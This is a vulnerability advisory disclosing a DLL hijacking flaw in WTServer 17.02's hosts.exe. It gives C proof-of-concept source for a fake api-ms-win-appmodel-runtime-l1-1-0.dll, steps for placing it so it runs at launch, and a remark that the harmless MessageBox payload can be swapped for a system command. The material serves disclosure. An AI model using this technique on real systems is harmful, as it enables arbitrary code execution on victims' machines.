[+] Title: WTServer-17.02 - DLL Loading Arbitrary Code Execution
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com
[+] Author Company: Henceforth

Vendor:
===============

http://wtserver.wtriple.com/
  
 
Download:
===========

https://sourceforge.net/projects/wtnmp/files/latest/download?source=directory

About Product:
===============

WTServer - Nginx MariaDB Redis Php development stack for Windows

A lightweight, fast and stable server stack for developing php mysql applications on windows, based on the excellent webserver Nginx. A lighter alternative to XAMPP and WAMP.


Package contains:
- Nginx 1.11.10 web server
- MariaDB 10.1.21 database server, mysql replacement (32/64bit)
- Redis 3.2 Cache/NoSql, memcached alternative (64bit)
- Php 5.6.30 & PHP 7.0.16 & PHP 7.1.2 scripting language (32/64bit)
- WinSCP SFTP client
- HTTPS using free LetsEncrypt certificates
- Composer dependency manager for php
- Adminer web based database manager
- Reg.php regular expressions tester
- WTServer Manager (32/64bit), formerly known as *wt-nmp* 
 
Vulnerability Type:
===================

DLL Loading Arbitrary Code Execution.


Informations:
===================

The "hosts.exe" program is the vulnerable in WTServer and the vulnerable DLL is "api-ms-win-appmodel-runtime-l1-1-0.dll".


POC:
===================
Download the POC from github and compile it with "CodeBlocks" or "GCC" . 

https://gist.github.com/Nassim-Asrir/8f9a97919e84c4cddc491b317672172b

Data:

// Compile this code and rename it to "api-ms-win-appmodel-runtime-l1-1-0.dll" then copy it to "C:\WTServer\bin\HostsEditor" then launch "hosts.exe"
// For any informations contact me at: wassline@gmail.com

#include "main.h"

#include <windows.h>
#define DllExport __declspec (dllexport)
int mes()
{
  MessageBox(0, "DLL Hijacking Vulnerable", "Nassim Asrir", MB_OK);
  return 0;
}
BOOL WINAPI  DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
            {mes();}


- Download the POC and compile it and copy it to "C:\WTServer\bin\HostsEditor" then launch "hosts.exe" and you will see the MessageBox or you can modify in the code to launch a System Command (calc or ....) .
 
 
CVE Reference:
===============

N/A
 
 
Tested on:
=============== 

Windows 7

Win xp